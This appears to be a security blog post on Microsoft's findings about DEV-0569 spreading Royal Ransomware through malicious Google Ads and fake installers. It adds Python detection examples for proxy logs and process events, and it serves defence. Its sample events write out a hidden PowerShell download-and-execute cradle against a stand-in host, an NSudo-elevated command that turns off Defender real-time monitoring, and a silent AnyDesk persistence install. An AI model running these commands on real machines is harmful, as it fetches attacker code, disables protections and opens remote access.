In a recent report, Microsoft has revealed that a threat group is using Google Ads to distribute Royal Ransomware. This ransomware is relatively new, but it is already doing a lot of damage to the systems it reaches. The following lines explain the distribution method and the damage it does.
Royal Ransomware wreaks havoc, and Microsoft is close behind
This way of distributing malware was discovered by Microsoft's security team at the end of October. Microsoft tracks the group behind the activity and the malware under the name DEV-0569.
“Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation,” the Microsoft Security Threat Intelligence team stated in their report.
The method is simple: the group buys deceptive Google Ads that lead users to malware download links. The downloads masquerade as installers for well-known and legitimate programs such as Adobe Flash Player, AnyDesk, LogMeIn, Microsoft Teams, and Zoom.
The downloader used to fetch the malware is known as BATLOADER, a dropper whose job is to retrieve and run the next-stage payloads. That is how the ransomware reaches the victim. Microsoft also noted that BATLOADER shares overlaps with another malware family, ZLoader.
BATLOADER has been analyzed in depth by eSentire and VMware. Both found the malware to be stealthy and persistent, and both observed that it relies on SEO (Search Engine Optimization) poisoning to lure users into downloading it from compromised websites or from sites set up by the attackers.
Download links have also been distributed through spam emails, fake forum posts, blog comments, and even the contact forms found on the websites of the organizations being targeted.
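The initial-access trick above (a lookalike installer served from somewhere other than the vendor) is cheap to hunt for in web proxy logs. The following Python is an added example written for this post, not code from Microsoft's report or from Eagle Tech: it scans constructed proxy log lines for installer downloads whose filename or host name invokes one of the impersonated products but whose host is not one of that vendor's own domains. The vendor-domain allowlist is illustrative and is an assumption a real deployment would replace with its own reviewed list; Flash Player is treated as having no legitimate download source because it reached end of life in 2020.

```python
"""
Added example (not from Microsoft's report or this blog): flag installer
downloads whose filename or host invokes a well-known product but whose
host is not one of that vendor's own domains. The proxy log lines below
are constructed for the example.
"""
import re
from urllib.parse import urlparse

# Illustrative allowlist of vendor download domains. Assumption: a real
# deployment maintains its own, reviewed list.
VENDOR_DOMAINS = {
    "anydesk": {"anydesk.com"},
    "teams": {"microsoft.com"},
    "zoom": {"zoom.us"},
    "logmein": {"logmein.com"},
    # Flash Player reached end of life in 2020; no download source is legitimate.
    "flash": set(),
}

# Only binaries and archives are interesting as "installer" downloads.
INSTALLER_EXT = re.compile(r"\.(exe|msi|zip|iso|img)$", re.IGNORECASE)

# Constructed proxy log: "<timestamp> <client_ip> <method> <url> <status>"
SAMPLE_LOG = """\
2022-11-18T09:01:12Z 10.0.0.5 GET https://anydesk.com/en/downloads/windows 200
2022-11-18T09:03:44Z 10.0.0.7 GET https://anydesk-pro-download.example/AnyDesk.exe 200
2022-11-18T09:05:02Z 10.0.0.9 GET https://zoom.us/client/latest/ZoomInstaller.exe 200
2022-11-18T09:06:30Z 10.0.0.9 GET https://teams-setup.example.net/files/TeamsSetup.msi 200
2022-11-18T09:08:11Z 10.0.0.3 GET https://cdn.example.org/flash_player_update.exe 200
2022-11-18T09:10:00Z 10.0.0.4 GET https://sub.download.anydesk.com/AnyDesk.exe 200
"""


def is_vendor_host(host, product):
    """True if host is the vendor domain itself or a subdomain of it
    (suffix match on a label boundary, so anydesk.com.evil.example fails)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS[product])


def find_lookalike_downloads(log_text):
    """Return one finding per installer download that names a product but
    is served from outside that vendor's domains, in log order."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # blank or malformed line
        ts, client, _method, url, _status = parts[:5]
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        filename = parsed.path.rsplit("/", 1)[-1].lower()
        if not INSTALLER_EXT.search(filename):
            continue  # a landing page, not a binary
        for product in VENDOR_DOMAINS:
            if product in filename or product in host:
                if not is_vendor_host(host, product):
                    findings.append({
                        "ts": ts, "client": client, "host": host,
                        "file": filename, "product": product,
                    })
                break  # one product match per line is enough
    return findings


if __name__ == "__main__":
    for f in find_lookalike_downloads(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['product']} lookalike from {f['host']} ({f['file']})")
```

Run against the constructed log, the check flags the three downloads served from non-vendor hosts and lets the two genuine vendor downloads through; the landing-page hit is ignored because it is not a binary.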
DEV-0569 diversifies its operations
Microsoft also points out that “DEV-0569 has used varied infection chains using PowerShell and batch scripts that ultimately led to the download of malware payloads like information stealers or a legitimate remote management tool used for persistence on the network… The management tool can also be an access point for the staging and spread of ransomware.”
Another tool the group uses is NSudo, an open-source utility that launches programs with elevated privileges; DEV-0569 uses it to weaken defenses and attempt to disable antivirus software. By combining Google Ads with these varied payloads, DEV-0569 diversifies its operations and also acts as an initial access broker for other ransomware and malware operations such as Emotet, IcedID, and Qakbot.
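The post-compromise chain described in the two paragraphs above (batch and PowerShell scripts pulling down the next stage, NSudo launching an elevated process that tampers with antivirus, and a legitimate remote management tool installed for persistence) is the kind of pattern an endpoint or SIEM hunt can score from process-creation telemetry. The Python below is an added example for this post, not Microsoft's detection logic: it runs a handful of heuristic rules over constructed process-creation events. The events, the command-line patterns, the NSudo switches in the sample command line, and the list of RMM binaries are all assumptions made for the example.

```python
"""
Added example (not Microsoft's detection logic): score process-creation
events for the post-compromise pattern in the text: a downloaded installer
spawning scripts, a download cradle, NSudo launching an elevated process
that tampers with antivirus, and an RMM tool installed for persistence.
Events and patterns are constructed heuristics for the example.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Assumption: the RMM tools named on the page; extend with whatever is not sanctioned locally.
RMM_TOOLS = {"anydesk.exe", "logmein.exe"}

DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|start-bitstransfer",
    re.IGNORECASE)
AV_TAMPER = re.compile(r"set-mppreference\s+-disable\w+|disablerealtimemonitoring", re.IGNORECASE)
SILENT_INSTALL = re.compile(r"--install|--silent|/silent|/quiet|/qn\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


# Each rule is (name, predicate over one event dict).
RULES = [
    ("installer_spawns_script",
     lambda ev: "\\downloads\\" in ev["parent"].lower() and basename(ev["image"]) in SCRIPT_HOSTS),
    ("download_cradle",
     lambda ev: basename(ev["image"]) in SCRIPT_HOSTS
     and DOWNLOAD_CRADLE.search(ev["cmdline"]) is not None
     and "http" in ev["cmdline"].lower()),
    ("nsudo_launch", lambda ev: "nsudo" in basename(ev["image"])),
    ("child_of_nsudo", lambda ev: "nsudo" in basename(ev["parent"])),
    ("av_tamper", lambda ev: AV_TAMPER.search(ev["cmdline"]) is not None),
    ("rmm_install",
     lambda ev: basename(ev["image"]) in RMM_TOOLS and SILENT_INSTALL.search(ev["cmdline"]) is not None),
]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (parent image, image, command line).
SAMPLE_EVENTS = [
    {"ts": "09:06:41", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\Downloads\TeamsSetup.exe", "cmdline": "TeamsSetup.exe"},
    {"ts": "09:06:43", "parent": r"C:\Users\alice\Downloads\TeamsSetup.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\install.bat"},
    {"ts": "09:06:44", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://update.example/stage2.ps1')"},
    {"ts": "09:06:50", "parent": PS,
     "image": r"C:\Users\alice\AppData\Local\Temp\NSudoLG.exe",
     "cmdline": "NSudoLG.exe -U:T -P:E powershell.exe -Command "
                "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "09:06:51", "parent": r"C:\Users\alice\AppData\Local\Temp\NSudoLG.exe", "image": PS,
     "cmdline": "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "09:07:05", "parent": PS, "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    # Benign: an administrator's scheduled script; must not fire any rule.
    {"ts": "09:30:00", "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]


def evaluate(events):
    """Return one hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        for name, matches in RULES:
            if matches(ev):
                hits.append({"ts": ev["ts"], "rule": name, "image": basename(ev["image"])})
    return hits


def triggered_rules(events):
    """Distinct rule names that fired; several firing on one host is the signal."""
    return {h["rule"] for h in evaluate(events)}


if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"{h['ts']} {h['rule']:<24} {h['image']}")
```

On the constructed chain every rule fires at least once while the benign scheduled script fires none. Individually these heuristics are noisy (administrators do run PowerShell downloads and install AnyDesk); the useful signal is several of them firing on the same host within minutes, which is why the rule names are collected per host rather than alerted one by one.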
Microsoft’s recommendations are: “Since DEV-0569’s phishing scheme abuses legitimate services, organizations can also leverage mail flow rules to capture suspicious keywords or review broad exceptions, such as those related to IP ranges and domain-level allow lists.”
Keep in touch with our blog to read the latest news and innovations in the cybersecurity world.
Photo by Myriam Jessier on Unsplash.